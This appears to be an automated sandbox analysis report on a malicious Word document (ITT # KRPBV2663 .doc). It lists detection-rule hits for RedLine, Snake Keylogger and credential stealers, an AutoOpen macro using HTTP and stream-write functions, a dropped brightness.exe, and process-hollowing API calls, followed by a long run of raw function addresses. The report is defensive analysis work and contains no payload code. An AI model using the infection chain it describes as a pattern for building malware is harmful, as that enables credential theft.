                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Document contains an embedded VBA with functions possibly related to ADO stream file operations
                  Source: ITT # KRPBV2663 .docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, writeName: AutoOpen
                  Document contains an embedded VBA with functions possibly related to HTTP operations
                  Source: ITT # KRPBV2663 .docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: AutoOpen
                  Office process drops PE file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
                  Office process queries suspicious COM object (likely to drop second stage)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\InProcServer32Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C824C NtReadVirtualMemory,7_2_027C824C
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C84BC NtUnmapViewOfSection,7_2_027C84BC
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,7_2_027C8BA8
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C79AC NtAllocateVirtualMemory,7_2_027C79AC
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_027CDE78
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,7_2_027CDF00
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,7_2_027CDFE4
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C7CF8 NtWriteVirtualMemory,7_2_027C7CF8
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,7_2_027C8BA6
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C79AA NtAllocateVirtualMemory,7_2_027C79AA
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_027CDE24
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C824C NtReadVirtualMemory,12_2_028C824C
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C84BC NtUnmapViewOfSection,12_2_028C84BC
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_028C8BA8
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C79AC NtAllocateVirtualMemory,12_2_028C79AC
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028CDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_028CDE78
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028CDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,12_2_028CDFE4
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028CDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,12_2_028CDF00
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C7CF8 NtWriteVirtualMemory,12_2_028C7CF8
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_028C8BA6
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028C79AA NtAllocateVirtualMemory,12_2_028C79AA
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: 12_2_028CDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_028CDE24
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CF0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,7_2_027CF0A8
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B20C47_2_027B20C4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00408C6010_2_00408C60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040DC1110_2_0040DC11
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00407C3F10_2_00407C3F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00418CCC10_2_00418CCC
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00406CA010_2_00406CA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004028B010_2_004028B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041A4BE10_2_0041A4BE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041824410_2_00418244
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040165010_2_00401650
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00402F2010_2_00402F20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004193C410_2_004193C4
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041878810_2_00418788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00402F8910_2_00402F89
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00402B9010_2_00402B90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004073A010_2_004073A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_20E5156010_2_20E51560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_20E5155110_2_20E51551
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_20E512C010_2_20E512C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_20E512B010_2_20E512B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F741F110_2_23F741F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7B1DF10_2_23F7B1DF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7F0C810_2_23F7F0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7B7A010_2_23F7B7A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7B4C010_2_23F7B4C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7D49010_2_23F7D490
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7BA7F10_2_23F7BA7F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7AA5810_2_23F7AA58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7583110_2_23F75831
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7AF0010_2_23F7AF00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F75E5810_2_23F75E58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7BD6110_2_23F7BD61
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F78C7010_2_23F78C70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7307910_2_23F73079
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7E5E810_2_23F7E5E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7E5D910_2_23F7E5D9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7D48010_2_23F7D480
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_23F7AC2010_2_23F7AC20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503350810_2_25033508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503855010_2_25038550
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503004010_2_25030040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503073810_2_25030738
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503CB3810_2_2503CB38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25037A2810_2_25037A28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25030E3810_2_25030E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E53810_2_2503E538
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503854010_2_25038540
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E54810_2_2503E548
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503B56F10_2_2503B56F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503B58010_2_2503B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E99010_2_2503E990
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E9A010_2_2503E9A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503B9C810_2_2503B9C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503B9D810_2_2503B9D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503EDE910_2_2503EDE9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503EDF810_2_2503EDF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503000610_2_25030006
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503D83310_2_2503D833
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503D84010_2_2503D840
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503708010_2_25037080
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503DC8810_2_2503DC88
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503DC9810_2_2503DC98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E0E010_2_2503E0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503E0F010_2_2503E0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250334F810_2_250334F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503FB0010_2_2503FB00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503072B10_2_2503072B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503CB2810_2_2503CB28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503CF8310_2_2503CF83
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503CF9010_2_2503CF90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503D3D810_2_2503D3D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503D3E810_2_2503D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503BE2010_2_2503BE20
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25030E2B10_2_25030E2B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503BE3010_2_2503BE30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503F24410_2_2503F244
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503F25010_2_2503F250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503C27B10_2_2503C27B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503C28810_2_2503C288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503F69B10_2_2503F69B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503F6A810_2_2503F6A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503C6D010_2_2503C6D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503C6E010_2_2503C6E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2503FAF110_2_2503FAF1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250465C010_2_250465C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25046C1810_2_25046C18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25041EA810_2_25041EA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25047AF010_2_25047AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504230010_2_25042300
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25045D0010_2_25045D00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504390910_2_25043909
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25045D1010_2_25045D10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504E31010_2_2504E310
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504391810_2_25043918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504E32010_2_2504E320
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504C32010_2_2504C320
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504C33010_2_2504C330
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504A33010_2_2504A330
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25040D3810_2_25040D38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504A34010_2_2504A340
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F54F10_2_2504F54F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25040D4810_2_25040D48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504615810_2_25046158
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F56010_2_2504F560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504D56010_2_2504D560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25043D6310_2_25043D63
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504616810_2_25046168
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25043D7010_2_25043D70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504D57010_2_2504D570
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504B57010_2_2504B570
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504B58010_2_2504B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504119010_2_25041190
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250411A010_2_250411A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504E7A010_2_2504E7A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504E7B010_2_2504E7B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250465B010_2_250465B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504C7B210_2_2504C7B2
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504A7BF10_2_2504A7BF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250441B810_2_250441B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504C7C010_2_2504C7C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250441C810_2_250441C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504A7D010_2_2504A7D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F9E210_2_2504F9E2
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250415E810_2_250415E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F9F010_2_2504F9F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504D9F110_2_2504D9F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250415F810_2_250415F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504000610_2_25040006
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504DA0010_2_2504DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504BA0110_2_2504BA01
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504BA1010_2_2504BA10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504461010_2_25044610
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504462010_2_25044620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504802010_2_25048020
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504EC2F10_2_2504EC2F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25041A4010_2_25041A40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504EC4010_2_2504EC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504004010_2_25040040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504CC4010_2_2504CC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25041A5010_2_25041A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504CC5010_2_2504CC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504545010_2_25045450
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504AC5010_2_2504AC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504305810_2_25043058
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504AC6010_2_2504AC60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504546010_2_25045460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504306810_2_25043068
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25044A6B10_2_25044A6B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504DE7F10_2_2504DE7F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25044A7810_2_25044A78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504927810_2_25049278
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504BE8F10_2_2504BE8F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504928810_2_25049288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504048910_2_25040489
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504DE9010_2_2504DE90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504049810_2_25040498
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25041E9810_2_25041E98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504BEA010_2_2504BEA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25049EA210_2_25049EA2
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250458AF10_2_250458AF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250458A810_2_250458A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25049EB010_2_25049EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250434B310_2_250434B3
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F0BF10_2_2504F0BF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250458B810_2_250458B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250434C010_2_250434C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25044EC010_2_25044EC0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504D0CF10_2_2504D0CF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25044ED010_2_25044ED0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504F0D010_2_2504F0D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504B0DF10_2_2504B0DF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504D0E010_2_2504D0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250408E010_2_250408E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25047AE010_2_25047AE0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_2504B0F010_2_2504B0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250408F010_2_250408F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B490810_2_250B4908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B4FA810_2_250B4FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BDF0910_2_250BDF09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B890810_2_250B8908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B290810_2_250B2908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B710F10_2_250B710F
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B5E0010_2_250B5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BF70010_2_250BF700
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BB40010_2_250BB400
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B000610_2_250B0006
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B291810_2_250B2918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BDF1810_2_250BDF18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B091810_2_250B0918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B9C1810_2_250B9C18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BB41010_2_250BB410
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BF22A10_2_250BF22A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B092810_2_250B0928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B9C2810_2_250B9C28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B592810_2_250B5928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B712010_2_250B7120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BC72010_2_250BC720
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B322710_2_250B3227
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B323810_2_250B3238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B593810_2_250B5938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BF23810_2_250BF238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250BAF3810_2_250BAF38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_250B843210_2_250B8432
